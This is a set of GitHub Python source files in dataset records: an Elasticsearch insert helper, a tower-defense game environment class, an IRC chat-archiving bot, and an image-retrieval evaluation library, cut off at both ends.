bulk(es , actions)\n\n\n def setMapping(self,esServer, index_name, doc_type=\"logs\", field_type=((\"esDate\",\"date\"),)):\n es = Elasticsearch(esServer)\n if not es.indices.exists(index=index_name):\n innerdict={field[0]:{\"type\":field[1],\n } for field in field_type}\n\n my_mapping = {\n \"%s\"%(doc_type): {\n \"properties\":\n innerdict\n\n }\n }\n\n create_index = es.indices.create(index=index_name)\n mapping_index = es.indices.put_mapping(index=index_name, doc_type=doc_type,\n body=my_mapping)\n\n\n\n\nif __name__== \"__main__\":\n # inserutil = insertUtil()\n data = []\n dataDict = {\"ok\":1,\"ok2\":2,\"ok3\":\"ok3\"}\n data.append(dataDict)\n data.append(dataDict)\n # inserutil.insertBluk(\"192.168.12.81:9200\" , \"test5\" , \"logs\" , data)\n inserutil = insertUtil()\n inserutil.setMapping(\"192.168.12.81:9200\",\"testmap\",field_type=((\"ip\",\"keyword\"),(\"time\",\"date\"),(\"name\",\"text\")))\n inserutil.insertBluk(\"192.168.12.81:9200\", \"testmap\", \"logs\", data)", "repo_name": "workman-Lu/IPAM_for_pc", "sub_path": "pcGroup/elasticSearch/insertUtil.py", "file_name": "insertUtil.py", "file_ext": "py", "file_size_in_byte": 2676, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pcPython.pcGroup.util.requestUtil.post", "line_number": 21, "usage_type": "call"}, {"api_name": "pcPython.pcGroup.util.requestUtil", "line_number": 21, "usage_type": "name"}, {"api_name": "pcPython.pcGroup.util.requestUtil.post", "line_number": 23, "usage_type": "call"}, {"api_name": "pcPython.pcGroup.util.requestUtil", "line_number": 23, "usage_type": "name"}, {"api_name": "elasticsearch.Elasticsearch", "line_number": 36, "usage_type": "call"}, {"api_name": "elasticsearch.helpers.bulk", "line_number": 41, "usage_type": "call"}, {"api_name": "elasticsearch.Elasticsearch", "line_number": 45, "usage_type": "call"}]}
+{"seq_id": "27758783777", "text": "import copy\nimport utils.base_utils as base_utils\n\n\nclass BattleField:\n '''\n Class of the game environment\n '''\n '''\n Класс игрового окружения\n '''\n\n base_hp = base_utils.Bar()\n\n def __init__(self, max_base_hp, tower_space, waves, enemy_path):\n '''\n Init method of the game environment\n :param max_base_hp: max health points of the base\n :param tower_space: list with places available to place towers\n :param waves: list with enemy waves\n :param enemy_path: list with enemy path\n '''\n '''\n Метод инициализации игрового окружения\n :param max_base_hp: максимальное кол-во здоровья базы\n :param tower_space: список с местами доступными для застройки башнями\n :param waves: список с волнами врагов\n :param enemy_path: список с путем врагов\n '''\n\n self.base_hp = (0, max_base_hp, max_base_hp)\n self.money = 2000\n\n self.tower_space = tower_space\n self.enemy_path = enemy_path\n\n self.enemies = []\n self.towers = []\n self.enemy_generator = EnemyGenerator(waves, enemy_path, self)\n\n self.fresh_objs = []\n self.del_objs = []\n\n def get_enemies(self):\n '''\n Method that returns the list with all enemies\n '''\n '''\n Метод, возвращающий списко со всеми врагами\n '''\n\n return self.enemies\n\n def get_towers(self):\n '''\n Method that returns the list with all towers\n '''\n '''\n Метод, возвращающий списко со всеми башнями\n '''\n\n return self.towers\n\n def get_wave_data(self):\n '''\n Method that wraps the enemy generator get_wave_data\n '''\n '''\n Метод-обертка для метода get_wave_data генератора врагов\n '''\n\n return self.enemy_generator.get_wave_data()\n\n def income(self, money):\n '''\n Method that receive income\n '''\n '''\n Метод, примающий доход\n '''\n\n self.money += money\n\n def hit_base(self, dmg):\n '''\n Method that registers damage to the base\n :param dmg: dealt damage\n '''\n '''\n Метод, регистрирующий урон по базе\n :param dmg: нанесенный урон\n '''\n\n self.base_hp -= dmg\n\n def can_buy(self, tower_type):\n '''\n Method that checks the ability to but the tower\n of given type\n :param tower_type: type of tower to check for\n '''\n '''\n Метод, проверяющий возможность покупки данного типа\n башен\n :param tower_type: тип башен, для которого нужно проверить\n возможность покупки\n '''\n\n return tower_type.price <= self.money\n\n def get_free_space(self, tower_type):\n '''\n Method that returns available space to place tower of the\n given type\n :param tower_type: type of the tower to check for\n '''\n '''\n Метод, возвращающий возможные места для застройки данным типом\n башен\n :param tower_type: тип башен, для которого нужно проверить\n возможность застройки\n '''\n\n if tower_type.price <= self.money:\n return copy.deepcopy(self.tower_space)\n else:\n return list()\n\n def buy_tower(self, tower_pos, tower_type):\n '''\n Method that buys the tower of the given type and place\n it on given coords\n :param tower_pos: position to place tower on\n :param tower_type: type of the bought tower\n '''\n '''\n Метод, покупающий башню данного типа и устанавливающий\n ее на данную позицию\n :param tower_pos: позиция для установки башни\n :param tower_type: тип, купленной башни\n '''\n\n if tower_type.price <= self.money:\n new_tower = tower_type.get_tower(self, tower_pos)\n\n self.towers.append(new_tower)\n self.fresh_objs.append(new_tower)\n\n self.tower_space.remove(tower_pos)\n self.money -= tower_type.price\n return True\n else:\n return False\n\n def get_occupied_space(self):\n '''\n Method that returns list of place occupied by towers\n '''\n '''\n Метод, возращающий список с местми, занятыми башнями\n '''\n\n occupied_space = [tower.pos for tower in self.towers]\n return copy.deepcopy(occupied_space)\n\n def sell_tower(self, tower_pos):\n '''\n Method that sells the tower on the given position\n :tower_pos: position of tower to sell\n '''\n '''\n Метод, продающий башню на данной позиции\n :tower_pos: позиция башни, которую нужно продать\n '''\n\n for tower in self.towers:\n if tower.pos == tower_pos:\n self.towers.remove(tower)\n self.del_objs.append(tower)\n self.money += tower.sell()\n self.tower_space.append(tower_pos)\n\n def check_end(self):\n '''\n Method that checks for gameover\n '''\n '''\n Метод, проверяющий закончалась ли игра\n '''\n\n wave_flag = len(self.enemy_generator.waves) == 0\n enemy_flag = len(self.enemies) == 0\n health_flag = self.base_hp == 0\n\n return (wave_flag and enemy_flag) or health_flag\n\n def update(self, dt):\n '''\n Method that updates the game environment\n :param dt: amount of passed time\n '''\n '''\n Метод, обновляющий игровое окружение\n :param dt: кол-во прошедшего времени\n '''\n\n for enemy in self.enemies:\n enemy.run(dt)\n\n for tower in self.towers:\n tower.run(dt)\n\n dead_enemies = []\n for enemy in self.enemies:\n if not enemy.is_alive():\n dead_enemies.append(enemy)\n\n for enemy in dead_enemies:\n self.del_objs.append(enemy)\n self.enemies.remove(enemy)\n\n self.enemy_generator.run(dt)\n self.enemy_generator.generate_enemy()\n return not self.check_end()\n\n\nclass EnemyGenerator:\n '''\n Class of enemy generator\n '''\n '''\n Класс генератора врагов\n '''\n\n def __init__(self, waves, enemy_path, battle_field):\n '''\n Init method of enemy generator\n :param waves: list with enemy waves\n :param enemy_path: list with enemy path\n :param battle_fied: link to the current game environment\n '''\n '''\n Метод инициализации генератора врагов\n :param waves: список с волнами врагов\n :param enemy_path: список с путем врагов\n :param battle_field: ссылка на текущее игровое окружение\n '''\n\n self.waves = waves\n self.enemy_path = enemy_path\n self.battle_field = battle_field\n\n self.total_waves_number = len(self.waves)\n self.enemy_timer = base_utils.Timer(5)\n self.wave_timer = base_utils.Timer(10)\n\n def generate_enemy(self):\n '''\n Method that generates new enemy\n '''\n '''\n Метод, создающий нового врага\n '''\n\n if self.wave_timer.is_ringing():\n if self.enemy_timer.is_ringing():\n if len(self.waves) > 0:\n enemy_factory = self.waves[0].pop(0)\n new_enemy = enemy_factory.get_enemy(self.battle_field,\n self.enemy_path)\n self.battle_field.enemies.append(new_enemy)\n self.battle_field.fresh_objs.append(new_enemy)\n self.enemy_timer.reset()\n if len(self.waves[0]) == 0:\n self.waves.pop(0)\n self.wave_timer.reset()\n\n def run(self, dt):\n '''\n Method that describes enemy generator default behaviour\n :param dt: amount of passed time\n '''\n '''\n Метод, описывающий дефолтное поведение генератора врагов\n :param dt: кол-во прошедшего времени\n '''\n\n if self.wave_timer.is_ringing():\n self.enemy_timer.update(dt)\n else:\n self.wave_timer.update(dt)\n\n return len(self.waves) > 0\n\n def get_wave_data(self):\n '''\n Method that returns the wave data\n (current wave number, total waves number)\n '''\n '''\n Метод, возвращающий кортеж с номером, текущий волны,\n общим кол-вом волн\n '''\n\n curr_wave_number = self.total_waves_number - len(self.waves) + 1\n curr_wave_number = min(curr_wave_number, self.total_waves_number)\n return (curr_wave_number, self.total_waves_number)\n", "repo_name": "SenpaiKirigaia/AAA-Tower-defense", "sub_path": "model/battle_field.py", "file_name": "battle_field.py", "file_ext": "py", "file_size_in_byte": 9885, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.base_utils.Bar", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.base_utils", "line_number": 13, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 125, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 164, "usage_type": "call"}, {"api_name": "utils.base_utils.Timer", "line_number": 254, "usage_type": "call"}, {"api_name": "utils.base_utils", "line_number": 254, "usage_type": "name"}, {"api_name": "utils.base_utils.Timer", "line_number": 255, "usage_type": "call"}, {"api_name": "utils.base_utils", "line_number": 255, "usage_type": "name"}]}
+{"seq_id": "14025096488", "text": "#!/usr/bin/python3\nimport time\nimport json\nimport threading\nimport os\nfrom ircConnect import *\nfrom config import *\n\n#ESTABLISH CONNECTION TO IRC:\nirc = IRC(server, channel, botnick)\nirc.connect()\n\n#DEFINE TEMPORARY STORAGE OF MESSAGE CHAINS:\nchains = {}\n\n#RETRIEVE CURRENT JSON DATA:\ndata = {}\nwith open('chainlog.json', 'r') as jsonFile:\n data = json.load(jsonFile)\nnext_id = data[\"next_id\"]\n\n#MESSAGE CHAIN:\nclass Chain:\n def __init__(self, duration):\n self.start_time = time.time()\n self.duration = duration\n self.messages = []\n def add_message(self, name, message):\n self.messages.append(name + ': ' + message)\n def check_status(self):\n if time.time() - self.start_time > self.duration:\n return True\n else:\n return False\n\n#TIMER FOR UPDATING ARCHIVE:\nclass timerInstance (threading.Thread):\n def __init__(self, delay, next_id):\n threading.Thread.__init__(self)\n self.delay = delay\n self.next_id = next_id\n def run(self):\n while 1:\n time.sleep(self.delay)\n self.next_id = update_archive(self.next_id)\n\n#FUNCTION TO UPDATE ARCHIVE:\ndef update_archive(next_id):\n print('Archiving chains!')\n removeKeys = []\n for c in chains:\n if chains[c].check_status() == True:\n removeKeys.append(c)\n if not removeKeys:\n print('Done Archiving - no chains were archived')\n else:\n numArchived = len(removeKeys)\n with open('chainlog.json', 'w') as jsonFile:\n for k in removeKeys:\n data[\"chains\"].append({ \"id\":next_id, \"messages\":chains[k].messages })\n next_id += 1\n data[\"next_id\"] = next_id\n del chains[k]\n json.dump(data, jsonFile, indent = 4)\n print('Done Archiving -', numArchived, 'chains archived')\n return next_id\n\n#INSTANCE TIMER\ntimer = timerInstance(archive_check_delay, next_id)\ntimer.start()\n\n#main loop\nwhile 1:\n name, message = irc.rec_message()\n #message from troy or eby -- add message to all current chains\n if name in helpers:\n if all(bword not in message for bword in blocklist):\n print('message from helpers! adding to all chains.')\n for c in chains:\n c.add_message(name, message)\n #current chain exists from given user -- add message to chain\n elif name in chains:\n if all(bword not in message for bword in blocklist):\n print('new comment from origin of a chain, adding message.')\n chains[name].add_message(name, message)\n #detect new question, if reference to keywords\n else:\n if any(kword in message for kword in keywords):\n if all(bword not in message for bword in blocklist):\n if all(user != name for user in blockusers):\n print('new chain initialized.')\n chains[name] = Chain(chain_duration)\n chains[name].add_message(name, message)\n", "repo_name": "brainjos/skoop-ircScraper", "sub_path": "skoop.py", "file_name": "skoop.py", "file_ext": "py", "file_size_in_byte": 3006, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 19, "usage_type": "call"}, {"api_name": "time.time", "line_number": 25, "usage_type": "call"}, {"api_name": "time.time", "line_number": 31, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 37, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 39, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 39, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 44, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 64, "usage_type": "call"}]}
+{"seq_id": "9233453217", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\" Evaluation library\n\n\"\"\"\n\nfrom __future__ import print_function\nimport sys\nimport os\nimport json\nfrom collections import Counter\nfrom operator import itemgetter\nimport cv2\nimport numpy as np\nos.environ['GLOG_minloglevel'] = '2'\nfrom tqdm import tqdm\n\n\nclass ImageHelper(object):\n def __init__(self, S, L, means):\n self.S = S\n self.L = L\n self.means = means\n\n def prepare_image_and_grid_regions(self, fname, roi=None):\n \"\"\"\n\n :param fname: str\n :param roi: np.ndarray\n :return:\n \"\"\"\n # Extract image, resize at desired size, and extract roi region if\n # available. Then compute the rmac grid in the net format: ID X Y W H\n I, im_resized = self.load_and_prepare_image(fname, roi)\n if self.L == 0:\n # Encode query in mac format instead of rmac, so only one region\n # Regions are in ID X Y W H format\n R = np.zeros((1, 5), dtype=np.float32)\n R[0, 3] = im_resized.shape[1] - 1\n R[0, 4] = im_resized.shape[0] - 1\n else:\n # Get the region coordinates and feed them to the network.\n all_regions = []\n all_regions.append(self.get_rmac_region_coordinates(im_resized.shape[0], im_resized.shape[1], self.L))\n R = self.pack_regions_for_network(all_regions)\n return I, R\n\n @staticmethod\n def get_rmac_features(I, R, net):\n \"\"\"\n\n :param I: : np.ndarray\n :param R: : np.ndarray\n :param net:\n :return:\n \"\"\"\n net.blobs['data'].reshape(I.shape[0], 3, int(I.shape[2]), int(I.shape[3]))\n net.blobs['data'].data[:] = I\n net.blobs['rois'].reshape(R.shape[0], R.shape[1])\n net.blobs['rois'].data[:] = R.astype(np.float32)\n net.forward(end='rmac/normalized')\n return np.squeeze(net.blobs['rmac/normalized'].data)\n\n def load_and_prepare_image(self, fname, roi=None):\n \"\"\"\n\n :param fname: : str\n :param roi:\n :return:\n \"\"\"\n # Read image, get aspect ratio, and resize such as the largest side equals S\n im = cv2.imread(fname)\n im_size_hw = np.array(im.shape[0:2])\n ratio = float(self.S)/np.max(im_size_hw)\n new_size = tuple(np.round(im_size_hw * ratio).astype(np.int32))\n im_resized = cv2.resize(im, (new_size[1], new_size[0]))\n # If there is a roi, adapt the roi to the new size and crop. Do not rescale\n # the image once again\n if roi is not None:\n roi = np.round(roi * ratio).astype(np.int32)\n im_resized = im_resized[roi[1]:roi[3], roi[0]:roi[2], :]\n # Transpose for network and subtract mean\n I = im_resized.transpose(2, 0, 1) - self.means\n return I, im_resized\n\n @staticmethod\n def pack_regions_for_network(all_regions):\n n_regs = np.sum([len(e) for e in all_regions])\n R = np.zeros((n_regs, 5), dtype=np.float32)\n cnt = 0\n # There should be a check of overflow...\n for i, r in enumerate(all_regions):\n try:\n R[cnt:cnt + r.shape[0], 0] = i\n R[cnt:cnt + r.shape[0], 1:] = r\n cnt += r.shape[0]\n except:\n continue\n assert cnt == n_regs\n R = R[:n_regs]\n # regs where in xywh format. R is in xyxy format, where the last coordinate is included. Therefore...\n R[:n_regs, 3] = R[:n_regs, 1] + R[:n_regs, 3] - 1\n R[:n_regs, 4] = R[:n_regs, 2] + R[:n_regs, 4] - 1\n return R\n\n @staticmethod\n def get_rmac_region_coordinates(H, W, L):\n # Almost verbatim from Tolias et al Matlab implementation.\n # Could be heavily pythonized, but really not worth it...\n # Desired overlap of neighboring regions\n ovr = 0.4\n # Possible regions for the long dimension\n steps = np.array((2, 3, 4, 5, 6, 7), dtype=np.float32)\n w = np.minimum(H, W)\n\n b = (np.maximum(H, W) - w) / (steps - 1)\n # steps(idx) regions for long dimension. The +1 comes from Matlab\n # 1-indexing...\n idx = np.argmin(np.abs(((w**2 - w * b) / w**2) - ovr)) + 1\n\n # Region overplus per dimension\n Wd = 0\n Hd = 0\n if H < W:\n Wd = idx\n elif H > W:\n Hd = idx\n\n regions_xywh = []\n for l in range(1, L+1):\n wl = np.floor(2 * w / (l + 1))\n wl2 = np.floor(wl / 2 - 1)\n # Center coordinates\n if l + Wd - 1 > 0:\n b = (W - wl) / (l + Wd - 1)\n else:\n b = 0\n cen_w = np.floor(wl2 + b * np.arange(l - 1 + Wd + 1)) - wl2\n # Center coordinates\n if l + Hd - 1 > 0:\n b = (H - wl) / (l + Hd - 1)\n else:\n b = 0\n cen_h = np.floor(wl2 + b * np.arange(l - 1 + Hd + 1)) - wl2\n\n for i in cen_h:\n for j in cen_w:\n regions_xywh.append([j, i, wl, wl])\n\n # Round the regions. Careful with the borders!\n for region in regions_xywh:\n for j in range(4):\n region[j] = int(round(region[j]))\n if region[0] + region[2] > W:\n region[0] -= ((region[0] + region[2]) - W)\n if region[1] + region[3] > H:\n region[1] -= ((region[1] + region[3]) - H)\n return np.array(regions_xywh).astype(np.float32)\n\n\nclass Dataset(object):\n def __init__(self, img_root, two_stage_num_clusters, filename_poses):\n \"\"\"\n\n :param img_root: str\n :param two_stage_num_clusters: bool\n :param filename_poses: str\n \"\"\"\n self.img_root = img_root\n self.two_stage_num_clusters = two_stage_num_clusters\n self.image_data = self.load_image_data(filename_poses)\n self.size_dataset = len(self.image_data)\n self.db_indices = None\n self.all_query_info = None\n self.query_indices = None\n self.num_rooms = -1\n # Mapping from room string to room ID (used in custom aggregation mode and for ground truth in pano retrieval)\n self.room_string_to_id = None\n # Ground truth info\n self.query_id_to_positive_classes = None\n self.query_id_to_junk_classes = None\n # Mapping from image ID to room or panorama ID\n self.image_info = {}\n # Mapping from cluster ID to room ID / panorama ID / view IDs\n self.cluster_info = None\n # Random offset for intra-panorama aggregation\n self.pano_rand_offset = None\n\n def load_image_data(self, filename_poses):\n \"\"\"\n\n :param filename_poses: str\n :return:\n \"\"\"\n # Load image data from JSON file of full dataset and sort by increasing ID value\n #filename_poses = 'view_poses_filtered.json'\n assert os.path.exists(os.path.join(self.img_root, filename_poses)), \\\n 'The file %s was not found in %s' % (filename_poses, self.img_root)\n json_data = json.load(open(os.path.join(self.img_root, filename_poses)))\n image_data = sorted(json_data['images'], key=itemgetter('id'))\n assert [image['id'] for image in image_data] == range(len(image_data)), \\\n 'Non consecutive image IDs'\n return image_data\n\n def set_query_info(self, query_file):\n \"\"\"\n\n :param query_file: str\n :return:\n \"\"\"\n if query_file:\n json_data = json.load(open(query_file))\n for query in json_data['query_views']:\n assert query['filename'] == self.image_data[query['id']]['filename'], \\\n 'ID mismatch between dataset file and query file'\n self.all_query_info = sorted(json_data['query_views'], key=itemgetter('id'))\n else:\n self.all_query_info = []\n\n def set_db_info(self, db_file):\n \"\"\"\n\n :param db_file: : str\n :return:\n \"\"\"\n if db_file:\n json_data = json.load(open(db_file))\n for db_entry in json_data['db_views']:\n assert db_entry['filename'] == self.image_data[db_entry['id']]['filename'], \\\n 'ID mismatch between dataset file and database file'\n self.db_indices = np.sort([db_entry['id'] for db_entry in json_data['db_views']])\n else:\n self.db_indices = np.arange(len(self.image_data))\n\n def set_retrieval_info(self, query_file, db_file):\n \"\"\"\n\n :param query_file: str\n :param db_file: str\n :return:\n \"\"\"\n # Get query IDs from the query JSON file\n self.set_query_info(query_file)\n # Get database IDs from the database JSON file\n self.set_db_info(db_file)\n # Check that there is no overlap\n all_query_indices = [query['id'] for query in self.all_query_info]\n assert len(set(all_query_indices).intersection(set(self.db_indices))) == 0, \\\n 'Intersection between query and db images is not empty'\n\n # Get room IDs\n rooms = [image['room'] for image in self.image_data]\n room_id_to_string, self.image_info['room'] = np.unique(rooms, return_inverse=True)\n self.room_string_to_id = {}\n for room_id, room in enumerate(room_id_to_string):\n self.room_string_to_id[room] = room_id\n self.num_rooms = len(room_id_to_string)\n\n # Get panorama IDs\n panos = [image['source_pano_filename'] for image in self.image_data]\n _, self.image_info['pano'] = np.unique(panos, return_inverse=True)\n\n # This function takes as input the original view-level features and returns the aggregated features. For each\n # aggregated feature (cluster), it also populates the cluster information into the list self.cluster_info.\n def aggregate_features(self, features, feat_aggregation_stages, pooling, cluster_files, randomize=False):\n features_stages = []\n cluster_info_stages = []\n num_custom_stages = feat_aggregation_stages.count('custom')\n assert num_custom_stages == len(cluster_files) or num_custom_stages == 0, \\\n 'The number of cluster files should match the number of stages with custom aggregation'\n custom_idx = 0\n for feat_aggregation in feat_aggregation_stages:\n if feat_aggregation == 'custom':\n cluster_info = self.compute_clusters(feat_aggregation, cluster_files[custom_idx], randomize)\n custom_idx += 1\n else:\n cluster_info = self.compute_clusters(feat_aggregation, None, randomize)\n features_stage, cluster_info_nonempty = self.aggregate_by_cluster(features, cluster_info, pooling)\n # Remove empty clusters\n cluster_info_stages.append(cluster_info_nonempty)\n features_stages.append(features_stage)\n self.cluster_info = cluster_info_stages\n return features_stages\n\n def compute_clusters(self, feat_aggregation, cluster_file= None, randomize=False):\n \"\"\"\n\n :param feat_aggregation: str\n :param cluster_file: str\n :param randomize: bool\n :return:\n \"\"\"\n assert feat_aggregation.startswith(('none', 'yaw', 'pano', 'room', 'custom')), \\\n 'Invalid feat_aggregation string'\n cluster_info = []\n if feat_aggregation == 'none':\n for i in self.db_indices:\n cluster_info.append({\n 'room_id': self.image_info['room'][i],\n 'pano_id': self.image_info['pano'][i],\n 'image_id': i,\n 'image_ids': [i]\n })\n elif feat_aggregation.startswith('yaw'):\n # Adaptive scheme means that the number of bins is automatically related to the number of panoramas in the\n # room\n if '_' in feat_aggregation:\n num_bins_specified = int(feat_aggregation.split('_')[1])\n adaptive_scheme = feat_aggregation.startswith('yawadap')\n else:\n # yaw is equivalent to yawadap_1\n num_bins_specified = 1\n adaptive_scheme = True\n for room_id in range(self.num_rooms):\n db_in_room = np.intersect1d(np.where(self.image_info['room'] == room_id)[0], self.db_indices)\n if adaptive_scheme:\n # We bin the yaw angle so that the number of descriptors per room is (around)\n # the same as the number of panoramas\n panoramas = [self.image_data[db_idx]['source_pano_filename'] for db_idx in db_in_room]\n num_panos_in_room = len(np.unique(panoramas))\n num_bins = num_panos_in_room * num_bins_specified\n else:\n num_bins = num_bins_specified\n if num_bins == 0:\n continue\n yaw = np.array(\n [self.get_yaw_from_quaternion(self.image_data[db_idx]['final_camera_rotation'])\n for db_idx in db_in_room]\n )\n yaw_quant = np.digitize(yaw, np.arange(-np.pi, np.pi, 2*np.pi/num_bins))-1\n for yaw_id in range(num_bins):\n ids = db_in_room[np.where(yaw_quant == yaw_id)[0]]\n cluster_info.append({\n 'room_id': room_id,\n 'pano_id': None,\n 'image_id': None,\n 'image_ids': list(ids)\n })\n elif feat_aggregation.startswith('pano'):\n num_bins = 1\n num_bins_v = 1\n if '_' in feat_aggregation:\n num_bins = int(feat_aggregation.split('_')[1])\n if feat_aggregation.count('_') == 2:\n num_bins_v = int(feat_aggregation.split('_')[2])\n assert num_bins_v == 1 or num_bins_v == 3, \\\n 'Only 1 or 3 vertical bins are allowed'\n panoramas = []\n # For each panorama, draw a random offset value in [0, 360) so that the aggregation is randomized\n if self.pano_rand_offset is None:\n self.pano_rand_offset = {}\n for pano_filename in set([image['source_pano_filename'] for image in self.image_data]):\n self.pano_rand_offset[pano_filename] = np.random.rand() * 360\n for image in self.image_data:\n if len(image['filename'].split('_')) < 3:\n rel_yaw = 0\n else:\n rel_yaw = float(image['filename'].split('_')[-3])\n if randomize:\n rel_yaw = (rel_yaw + self.pano_rand_offset[image['source_pano_filename']]) % 360\n rel_yaw_bin = np.floor(rel_yaw * num_bins / 360)\n pitch_bin = 0\n if num_bins_v > 1 and len(image['filename'].split('_')) >= 3:\n pitch = float(image['filename'].split('_')[-1][:-4])\n if pitch < -10.0:\n pitch_bin = 0\n elif pitch > 10.0:\n pitch_bin = 2\n else:\n pitch_bin = 1\n panoramas.append('%s_%d_%d' % (image['source_pano_filename'], rel_yaw_bin, pitch_bin))\n panoramas = np.array(panoramas)\n unique_panoramas = np.unique(panoramas)\n for pano in unique_panoramas:\n cluster_ids = np.where(panoramas == pano)[0]\n # Unchecked: we expect that all images associated to a panorama have the same pano ID\n room_id = self.image_info['room'][cluster_ids[0]]\n pano_id = self.image_info['pano'][cluster_ids[0]]\n ids = np.intersect1d(cluster_ids, self.db_indices)\n cluster_info.append({\n 'room_id': room_id,\n 'pano_id': pano_id,\n 'image_id': None,\n 'image_ids': list(ids)\n })\n elif feat_aggregation == 'room':\n for room_id in range(self.num_rooms):\n db_in_room = np.intersect1d(np.where(self.image_info['room'] == room_id)[0], self.db_indices)\n cluster_info.append({\n 'room_id': room_id,\n 'pano_id': None,\n 'image_id': None,\n 'image_ids': list(db_in_room)\n })\n elif feat_aggregation == 'custom':\n clusters = json.load(open(cluster_file))\n for room in clusters:\n if not isinstance(clusters[room], list):\n continue\n if room in self.room_string_to_id:\n room_id = self.room_string_to_id[room]\n else:\n room_id = None\n for cluster in clusters[room]:\n assert len(np.setdiff1d(cluster['ids'], self.db_indices)) == 0, \\\n 'The clustering file should only include views included in the database'\n cluster_info.append({\n 'room_id': room_id,\n 'pano_id': None,\n 'image_id': None,\n 'image_ids': cluster['ids']\n })\n else:\n raise NotImplementedError('Unsupported aggregation mode')\n return cluster_info\n\n @staticmethod\n def get_yaw_from_quaternion(quat):\n \"\"\"\n\n :param quat: list\n :return:\n \"\"\"\n # Returns a yaw value in [-pi, pi]\n return np.arctan2(2.0*(quat[1]*quat[2] + quat[3]*quat[0]),\n quat[3]*quat[3] - quat[0]*quat[0] - quat[1]*quat[1] + quat[2]*quat[2])\n\n def aggregate_by_cluster(self, features, cluster_info, pooling):\n valid_cluster_indices = []\n aggregated_features = []\n for cluster_idx, cluster in enumerate(cluster_info):\n feat_indices = [np.where(self.db_indices == i)[0][0] for i in cluster['image_ids']]\n if not feat_indices:\n continue\n valid_cluster_indices.append(cluster_idx)\n x = features[feat_indices, :]\n if pooling == 'mean':\n aggregated_feature = np.mean(x, axis=0)\n elif pooling == 'gmp':\n aggregated_feature = np.mean(np.dot(np.linalg.inv(np.dot(x, x.T)+np.eye(x.shape[0])), x), axis=0)\n else:\n raise NotImplementedError('Unsupported pooling strategy')\n aggregated_features.append(aggregated_feature)\n # Only keep non-empty clusters\n cluster_info_nonempty = [cluster_info[i] for i in valid_cluster_indices]\n aggregated_features = np.array(aggregated_features)\n # Normalize features\n aggregated_features /= np.sqrt((aggregated_features * aggregated_features).sum(axis=1))[:, None]\n return aggregated_features, cluster_info_nonempty\n\n def get_filename(self, i):\n return os.path.normpath(\"{0}/{1}\".format(self.img_root, self.image_data[i]['filename']))\n\n\nclass PanoRetrievalDataset(Dataset):\n def get_pano_info(self):\n # For each panorama, we look up the camera location and the room ID\n panos = [image['source_pano_filename'] for image in self.image_data]\n _, unique_panos_index = np.unique(panos, return_index=True)\n pano_info = []\n for i in unique_panos_index:\n pano_location = np.array(self.image_data[i]['camera_location'])\n room_id = self.image_info['room'][i]\n db_ids = set(np.where(self.image_info['pano'] == self.image_info['pano'][i])[0]). \\\n intersection(set(self.db_indices))\n pano_info.append({'location': pano_location, 'room_id': room_id, 'db_ids': sorted(list(db_ids))})\n return pano_info\n\n def set_ground_truth_info(self, pano_dist_threshold, ignore_rooms=False):\n \"\"\"\n\n :param pano_dist_threshold: float\n :param ignore_rooms: bool\n :return:\n \"\"\"\n pano_info = self.get_pano_info()\n\n # Get ground truth information based on panorama location\n self.query_indices = []\n self.query_id_to_positive_classes = {}\n for query_info in self.all_query_info:\n query_idx = query_info['id']\n query_location = np.array(self.image_data[query_idx]['camera_location'])\n if 'room_labels' in query_info:\n query_pano_rooms = [self.room_string_to_id[room] for room in query_info['room_labels']]\n else:\n query_pano_rooms = [self.image_info['room'][query_idx]]\n assert self.image_info['room'][query_idx] in query_pano_rooms, \\\n 'The room containing the panorama is not listed in the list of ground truth rooms'\n # Find matching panoramas (only consider the ones corresponding to db images)\n pano_query_dist = np.full(len(pano_info), np.nan)\n for i, pano in enumerate(pano_info):\n if not ignore_rooms and pano['room_id'] not in query_pano_rooms:\n continue\n if len(pano['db_ids']) == 0:\n # Pano isn't a db pano\n continue\n pano_query_dist[i] = np.linalg.norm(query_location - pano['location'])\n if np.all(np.isnan(pano_query_dist)):\n print('WARNING: No available panorama for ground truth.')\n continue\n # Note: we suppress warnings for this command because Numpy complains about nan comparisons\n with np.errstate(invalid='ignore'):\n sub_thresh_panos = np.where(pano_query_dist < pano_dist_threshold)[0]\n if len(sub_thresh_panos) > 0:\n gt_pano_ids = sub_thresh_panos\n else:\n gt_pano_ids = np.array([np.nanargmin(pano_query_dist)])\n self.query_indices.append(query_idx)\n self.query_id_to_positive_classes[query_idx] = gt_pano_ids\n self.query_indices = np.array(self.query_indices, dtype=int)\n\n\nclass FeatureExtractor(object):\n def __init__(self, temp_dir, multires, S, L):\n \"\"\"\n\n :param temp_dir: str\n :param multires: bool\n :param S:\n :param L:\n \"\"\"\n self.temp_dir = temp_dir\n self.multires = multires\n self.S = S\n self.L = L\n self.features_queries = None\n self.features_dataset = None\n\n def extract_features(self, dataset, image_helper, net):\n \"\"\"\n\n :param dataset: Dataset\n :param image_helper: ImageHelper\n :param net:\n :return:\n \"\"\"\n Ss = [self.S, ] if not self.multires else [self.S - 250, self.S, self.S + 250]\n for S in Ss:\n # Set the scale of the image helper\n image_helper.S = S\n out_descr_fname = \"{0}/descr_S{1}_L{2}.npy\".format(self.temp_dir, S, self.L)\n generate_features = False\n if os.path.exists(out_descr_fname):\n features = np.load(out_descr_fname)\n if features.shape[0] != dataset.size_dataset:\n print('--> Pre-generated features have incorrect shape ; generating new features')\n generate_features = True\n else:\n generate_features = True\n if generate_features:\n dim_features = net.blobs['rmac/normalized'].data.shape[1]\n features = np.empty((dataset.size_dataset, dim_features), dtype=np.float32)\n features.fill(np.nan)\n # Check which of the features we need to compute haven't been computed yet (= nan)\n compute_indices = []\n for i in np.concatenate((dataset.query_indices, dataset.db_indices)):\n if np.isnan(features[i, 0]):\n 